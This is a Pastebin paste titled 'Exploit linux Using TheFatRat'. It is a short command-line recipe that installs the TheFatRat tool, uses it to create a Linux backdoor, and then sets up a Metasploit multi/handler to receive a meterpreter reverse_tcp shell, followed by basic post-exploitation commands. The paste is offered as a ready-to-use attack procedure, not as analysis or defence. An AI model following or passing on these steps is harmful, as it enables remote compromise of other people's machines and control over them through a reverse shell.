Advertisement
Professional-hacker

Exploit linux Using TheFatRat

Dec 28th, 2016
397
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.27 KB | None | 0 0
  1. ##################################################JokerSecurity#########################################################
  2. # Title : Exploit linux Using TheFatRat
  3. # Tested On : [ Kali-Linux ]
  4. # MyChannel Youtube : https://www.youtube.com/channel/UCPRRAzu8dMWxChn-RruC-eg/videos
  5. # Myblog : http://kader-information.blogspot.com/
  6. # Link Video : https://www.youtube.com/watch?v=IzmwNtpFiRo&feature=youtu.be
  7. ######################
  8. # [+] COMMENDS :
  9. ######################
  10. Link Download Tools
  11. -----------------
  12. https://github.com/Screetsec/TheFatRat
  13. install Tools :
  14. ===========
  15. git clone https://github.com/Screetsec/TheFatRat
  16. cd TheFatRat
  17. cd setup
  18. ./setup.sh
  19.  
  20. create Backdoor :
  21. ================
  22. cd TheFatRat
  23. ./fatrat
  24.  
  25. metasploit commends
  26. ================
  27. msfconsole
  28. use multi/handler
  29. set payload linux/x86/meterpreter/reverse_tcp
  30. set lhost (yourip)
  31. set lport 4444
  32. exploit
  33. sysinfo
  34. ls
  35. help
  36.  
  37. subscribe for my channel and page in facebook
  38.  
  39. # My Blogger : http://kader-information.blogspot.com/
  40.  
  41. # Page FacebOOk 1: https://www.facebook.com/AnonymousPalestine.vip
  42.  
  43. # Page Facebook 2 : https://www.facebook.com/Professional.hacker.25
  44.  
  45. By <3
  46.  
  47. ##################################################JokerSecurity#########################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement